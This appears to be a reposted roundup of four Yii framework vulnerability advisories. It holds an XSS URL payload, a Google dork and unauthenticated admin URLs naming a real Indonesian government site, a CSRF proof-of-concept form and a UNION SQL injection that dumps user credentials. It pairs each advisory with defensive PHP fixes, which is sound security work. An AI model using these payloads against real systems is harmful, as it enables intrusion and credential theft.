Yii Framework Vulnerability Roundup
Date: 2020-03-26
1. Yii Framework 2.0.9 - Cross Site Scripting
# Exploit Title: Yii Framework 2.0.9 - Cross Site Scripting
# Discovery Date: 2019-02-12
# Exploit Author: Gionathan "John" Reale
# Vendor Homepage: https://www.yiiframework.com/
# Version: 2.0.9
# CVE: CVE-2018-6010

In Yii Framework 2.x before 2.0.14, a reflected XSS vulnerability can be exploited from exception messages printed by the error handler in non-debug mode, related to base/ErrorHandler.php, log/Dispatcher.php, and views/errorHandler/exception.php.

Example:
http://fakewebsite.com/materiel/index?&MaterielTourModel[publication_date]=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%3Cscript%3Ealert(%221%22)%3C/script%3E
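The defect behind this advisory is an exception message reaching the page without HTML encoding, and the fix that shipped in 2.0.14 encodes the message before output; in an application's own error view `yii\helpers\Html::encode()` does the same job. What follows is an added example, not code from Yii or from the advisory: plain PHP with a constructed exception message modelled on the advisory's payload, showing the raw rendering next to the encoded one. The exception text and the `renderError*` function names are assumptions made for the illustration.

```php
<?php
// Added example, not code from Yii or from the advisory: render an exception
// message into HTML the way an error page must, i.e. HTML-encoded, so that
// attacker-controlled text which lands in an exception message cannot turn
// into markup. yii\helpers\Html::encode() in a Yii 2 error view does what
// htmlspecialchars() does below.
declare(strict_types=1);

// Vulnerable pattern: the raw message is interpolated into the page.
function renderErrorUnsafe(Throwable $e): string
{
    return '<div class="error">' . $e->getMessage() . '</div>';
}

// Hardened pattern: encode before interpolating. ENT_QUOTES also encodes
// both quote characters, so the result is safe inside attribute values;
// ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
function renderErrorSafe(Throwable $e): string
{
    $text = htmlspecialchars($e->getMessage(), ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<div class="error">' . $text . '</div>';
}

// Constructed input modelled on the advisory's payload: a field value that a
// parser or validator echoes back inside the message of the exception it throws.
$userInput = 'AAAA<script>alert("1")</script>';
$exception = new InvalidArgumentException(
    "The format of 'publication_date' is invalid: {$userInput}"
);

echo renderErrorUnsafe($exception), PHP_EOL; // the <script> tag survives verbatim
echo renderErrorSafe($exception), PHP_EOL;   // the tag is rendered as &lt;script&gt;...

// The check a regression test should keep: no raw tag survives encoding.
assert(strpos(renderErrorSafe($exception), '<script') === false);
assert(strpos(renderErrorUnsafe($exception), '<script') !== false);
```

The error view is only half of the mitigation: keep `YII_DEBUG` false in production as well, because the detailed debug exception page exposes far more than the message, and upgrade past 2.0.14 rather than relying on a custom view alone, since the advisory names three framework files that print the message.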
2. Powered by Yii Framework RBAC Manager for Yii 2 Improper Authentication Vulnerability
#################################################################################################
# Exploit Title : Powered by Yii Framework RBAC Manager for Yii 2 Improper Authentication Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 01/07/2018
# Vendor Homepage : yiiframework.com
# Tested On : Windows
# Software Download and Installation Links :
#   packagist.org/packages/mdmsoft/yii2-admin
#   github.com/yii2mod/yii2-rbac
#   github.com/mdmsoft/yii2-admin
#   yiiframework.com/extension/rbac-manager
#   yiiframework.com/extension/yii2-admin
#   travis-ci.org/mdmsoft/yii2-admin
#   scrutinizer-ci.com/g/mdmsoft/yii2-admin/?branch=master
#   codeclimate.com/github/mdmsoft/yii2-admin
# Category : WebApps
# Versions : 2.x and 3.x
# Exploit Risk : Medium
# CWE : CWE-287 [ Improper Authentication ]
#################################################################################################
# Another Title : Powered by Yii Framework PHP Web Application Development Improper Authentication Vulnerability

Yii Framework yii2-admin RBAC Manager for Yii 2: a GUI manager for RBAC (Role Based Access Control) in Yii2. Easy to manage authorization of users.

Features of the Product [ Software ]
- Manage the RBAC System in an intuitive Tree-View
- Keep cool with recursion protection in the RBAC Tree
- Generate PHP Code
- Full relational move, create, edit, delete support for RBAC Tree items
- Assign and eject multiple Roles to and from multiple Users
- Create predefined business Rules for User Assignments
- Assign Roles in Secure Mode: Roles and Assignments protected by the Controller and not changeable
- Use easy checkAccess() methods in your Controller
- Create easy bizRule Code in your RBAC Roles and Assignments
################################################################################################
# Description for Improper Authentication Vulnerability [ CWE-287 ]
+ When an actor claims to have a given identity, the software does not prove or insufficiently proves that the claim is correct.
+ If software incorrectly validates user logon information or allows using different techniques of malicious credential gathering (e.g. brute force, spoofing or changing the URL links without giving a username and password), an attacker can gain certain privileges within the application or disclose sensitive information.
+ If the parameter is equal to "user" the application allows viewing the information; if it is equal to "admin", then it is possible to edit information on the page.
+ If an attacker changes the value of the "group" parameter to "admin", he will be able to modify the page.
+ The Powered by Yii Framework RBAC Manager for Yii 2 vulnerability results from software misconfiguration.
+ The attacker might be able to gain unauthorized access to the application and otherwise restricted areas and perform certain actions, e.g. disclose sensitive information, alter the application, or even execute arbitrary code.
+ An attacker can use a variety of vectors to exploit this weakness, including brute-force, session fixation, and Man-in-the-Middle (MitM) attacks.
Reference [ Short Explained by me ] => CWE-287: Improper Authentication [cwe.mitre.org]
#################################################################################################
# Google Dork : inurl:''/emusrenbang/web/index.php?r=''
# Administration Login Panel => /emusrenbang/web/index.php?r=site%2Flogin
# Exploit : No Username. No Password. No Need for Login Credentials. The web application doesn't require a login. Just enter this link after the URL:
/emusrenbang/web/index.php?r=admin
Whatever you give as an exploit, like [ anything' OR 'x'='x ] or [ '=''or' ] and many other SQL Authentication Bypasses, it always says "Incorrect username or password." But we will jump over the admin-door wall. This is called an Improper Authentication Vulnerability.
127.0.0.1/emusrenbang/web/index.php?r=site%2Flogin => [ Proof of Concept ] => archive.is/BLaE5
127.0.0.1/emusrenbang/web/index.php?r=admin => [ Proof of Concept ] => archive.is/D9dKP
Usable Admin Control Panel URL Links =>
/emusrenbang/web/index.php?r=admin
/emusrenbang/web/index.php?r=admin%2Fassignment
/emusrenbang/web/index.php?r=admin%2Frole
/emusrenbang/web/index.php?r=admin%2Fpermission
/emusrenbang/web/index.php?r=admin%2Froute
/emusrenbang/web/index.php?r=admin%2Frule
/emusrenbang/web/index.php?r=admin%2Fmenu
/emusrenbang/web/index.php?r=admin%2Fdefault%2Findex
#################################################################################################
The Indonesian Government site [ Bappeda Provinsi Sumatera Utara 2016 ] is the only vulnerable website.
# Example Site => eplanning.sumutprov.go.id/emusrenbang/web/index.php?r=admin%2Fmenu
# [ Proof of Concept ] => archive.is/lCRem
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
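The advisory itself says the problem is misconfiguration rather than a flaw in the RBAC manager's code: the routes it lists (`admin`, `admin/role`, `admin/assignment`, ...) are served to anonymous visitors when the application's access filter whitelists them. The yii2-admin extension's sample configuration lists `admin/*` among the allowed actions with a comment to add or remove entries, and a deployment that keeps that line has exactly this exposure. The following is an added example, not code from the extension or the advisory: a `config/web.php` fragment with the weak whitelist next to a corrected one, using the class names of the mdmsoft/yii2-admin extension listed above and Yii 2's core `yii\filters\AccessControl`; the `site/*` action names are an assumption.

```php
<?php
// Added example (not the yii2-admin project's own code): the part of a Yii 2
// application config (config/web.php) that decides whether the RBAC manager's
// routes (?r=admin, ?r=admin%2Frole, ?r=admin%2Fassignment, ...) demand a
// login. Class names are those of mdmsoft/yii2-admin and of Yii 2 core; the
// action names are a constructed illustration.

// Weak: 'admin/*' is whitelisted, so every request to the module is served
// without any identity check. Leaving this entry in place is the
// misconfiguration that makes the advisory's URLs work for anyone.
$weakConfig = [
    'modules' => [
        'admin' => ['class' => 'mdm\admin\Module'],
    ],
    'as access' => [
        'class' => 'mdm\admin\components\AccessControl',
        'allowActions' => [
            'site/*',
            'admin/*',
        ],
    ],
];

// Corrected: only the few genuinely public actions bypass the check. Any other
// route, admin/* included, is served only when Yii::$app->user->can($route)
// holds, which fails for a guest and for an authenticated user who has not
// been granted that route through the RBAC tree.
$correctedConfig = [
    'modules' => [
        'admin' => ['class' => 'mdm\admin\Module'],
    ],
    'as access' => [
        'class' => 'mdm\admin\components\AccessControl',
        'allowActions' => [
            'site/login',
            'site/logout',
            'site/error',
        ],
    ],
];

// Defence in depth on the module itself, independent of the global filter:
// Yii's core access filter attached to the admin module refuses guests
// ('@' matches any authenticated user) before any of its controllers run,
// so a later edit to allowActions cannot silently reopen the module.
$correctedConfig['modules']['admin']['as guestFilter'] = [
    'class' => 'yii\filters\AccessControl',
    'rules' => [
        ['allow' => true, 'roles' => ['@']],
    ],
];

return $correctedConfig;
```

The acceptance check for any deployment of the module is a single anonymous request to `/index.php?r=admin`: with the corrected configuration it must answer with a redirect to the login page or a 403, never a 200 carrying the RBAC tree. Repeating that request for the other `admin%2F...` routes in the advisory's list catches a whitelist that was narrowed for `admin` alone.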
3. Yii Framework Blog Cross Site Request Forgery
# Exploit Title: Yii Framework Blog Application CSRF Vulnerability
# Date: 3 Mar 2014
# Author: Christy Philip Mathew
# Demo: Yii Blog Application - http://www.yiiframework.com/demos/blog/
# Category: web
# Tested on: Windows 8

Attacker will be able to create a post.

<html>
<body>
<form action="http://www.yiiframework.com/demos/blog/index.php/post/create" method="POST">
  <input type="hidden" name="Post[title]" value="test" />
  <input type="hidden" name="Post[content]" value="test" />
  <input type="hidden" name="Post[tags]" value="test" />
  <input type="hidden" name="Post[status]" value="2" />
  <input type="hidden" name="yt0" value="Create" />
  <input type="submit" value="Submit form" />
</form>
</body>
</html>
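The demo blog is a Yii 1.1 application (the `index.php/post/create` route and the `yt0` button name are Yii 1 conventions), and Yii 1.1 ships a synchronizer-token CSRF defence that is switched off by default, which is why the form above is accepted. Below is an added example, not the demo's own code, of the configuration that turns the defence on and of a form rendered so that it keeps working afterwards; `$model` stands for the view's form model and the field names are assumptions.

```php
<?php
// Added example (not the Yii demo blog's own code): enabling Yii 1.1's
// built-in CSRF protection. Once enabled, CHttpRequest::validateCsrfToken()
// compares the YII_CSRF_TOKEN POST field against the token cookie on every
// POST request and answers HTTP 400 when they do not match. A page on another
// origin, such as the form above, cannot read the victim's token, so its
// submission never reaches PostController::actionCreate().

// protected/config/main.php (the array the file returns)
$config = [
    'components' => [
        'request' => [
            'enableCsrfValidation' => true,
            // Defaults shown explicitly: the cookie carries the token that the
            // hidden form field must match.
            'csrfTokenName' => 'YII_CSRF_TOKEN',
            'csrfCookie' => ['httpOnly' => true],
        ],
    ],
];

// protected/views/post/_form.php: with validation enabled, CHtml::beginForm()
// (and CActiveForm, which wraps it) inserts the hidden YII_CSRF_TOKEN input
// itself, so legitimate forms keep working and only token-less ones fail.
echo CHtml::beginForm(['post/create'], 'post');
echo CHtml::activeTextField($model, 'title');
echo CHtml::activeTextArea($model, 'content');
echo CHtml::submitButton('Create');
echo CHtml::endForm();
```

After the switch is flipped, replaying the advisory's form against a test instance is the check: the expected answer is a 400 "The CSRF token could not be verified" rather than a created post. Forms that were written by hand with a bare `<form>` tag, or JavaScript that posts without reading the token, will fail the same way and need the hidden field added.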
4. Yii Framework Search SQL Injection Vulnerability
# Exploit Title: Yii Framework - Search SQL Injection Vulnerability
# Google Dork: No Dork
# Date: 20/11/2012
# Exploit Author: Juno_okyo
# Vendor Homepage: http://www.yiiframework.com/
# Software Link: http://www.yiiframework.com/download/
# Version: 1.1.8 (maybe another version)
#
#### Vulnerability:
##################################
SQL Injection via search form. You can query to get some info about the administrator account and something...
##################################
Exploitation:
##################################
' UNION SELECT 1,group_concat(username,0x7c,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 fRom user-- -
##################################
More Details:
##################################
Website: http://junookyo.blogspot.com/
About Exploit: http://junookyo.blogspot.com/2012/11/yii-framework-search-sql-injection.html
##################################
Great thanks to Juno_okyo and James - J2TeaM
##################################
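A `UNION` payload of this shape only works when the search keyword is pasted into the SQL text; Yii 1.1's query layer binds values instead (`CDbCriteria::addSearchCondition()`, `CDbCriteria::compare()` with `$partialMatch` set, or `CDbCommand::bindValue()`), and the injection disappears wherever the application uses it. The following is an added example, not Yii's or the advisory author's code: plain PDO against a constructed in-memory SQLite database, with the interpolating search beside the bound one so the difference is observable without a Yii install. The schema, the rows and the credential placeholder are constructed, and the advisory's payload is reduced to two columns to fit that schema.

```php
<?php
// Added example (not Yii's or the advisory author's code): the search pattern
// behind the advisory, once as string interpolation and once as a bound
// parameter, run against a constructed in-memory SQLite database.
declare(strict_types=1);

function buildDb(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE post (id INTEGER PRIMARY KEY, title TEXT)');
    $db->exec('CREATE TABLE user (id INTEGER PRIMARY KEY, username TEXT, password TEXT)');
    $db->exec("INSERT INTO post (title) VALUES ('Hello Yii'), ('Second post')");
    // Constructed sample credential row; the hash value is a placeholder.
    $db->exec("INSERT INTO user (username, password) VALUES ('admin', 'PLACEHOLDER_HASH')");
    return $db;
}

// Vulnerable: the keyword becomes part of the SQL text, so a quote in it ends
// the string literal and everything after it is parsed as SQL.
function searchUnsafe(PDO $db, string $q): array
{
    $sql = "SELECT id, title FROM post WHERE title LIKE '%{$q}%'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: the keyword travels as a bound value and is never parsed as SQL.
// Escaping % and _ also stops the user from widening the LIKE pattern, which
// is what CDbCriteria::addSearchCondition() does in Yii 1.1.
function searchSafe(PDO $db, string $q): array
{
    $pattern = '%' . strtr($q, ['%' => '\%', '_' => '\_']) . '%';
    $stmt = $db->prepare("SELECT id, title FROM post WHERE title LIKE :q ESCAPE '\\'");
    $stmt->execute([':q' => $pattern]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$db = buildDb();
// The advisory's payload, reduced to two columns to match this schema.
$payload = "' UNION SELECT id, username || '|' || password FROM user-- -";

print_r(searchUnsafe($db, $payload)); // the user row comes back with the posts
print_r(searchSafe($db, $payload));   // empty: no title contains that text

// What a regression test should assert: the bound version never leaks, and
// an ordinary keyword still matches.
assert(searchSafe($db, $payload) === []);
assert(count(searchSafe($db, 'yii')) === 1);
```

In a Yii 1.1 controller the unsafe form is the one-liner `Post::model()->findAll("title LIKE '%$q%'")`; the bound form is `$criteria = new CDbCriteria; $criteria->addSearchCondition('title', $q); Post::model()->findAll($criteria);`. Auditing a code base for this advisory therefore means grepping for string interpolation inside `findAll()`, `findAllBySql()` and `createCommand()` arguments rather than looking for a framework patch, since the framework itself was never the injection point.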
Original source: https://www.cnblogs.com/junsec/p/12574932.html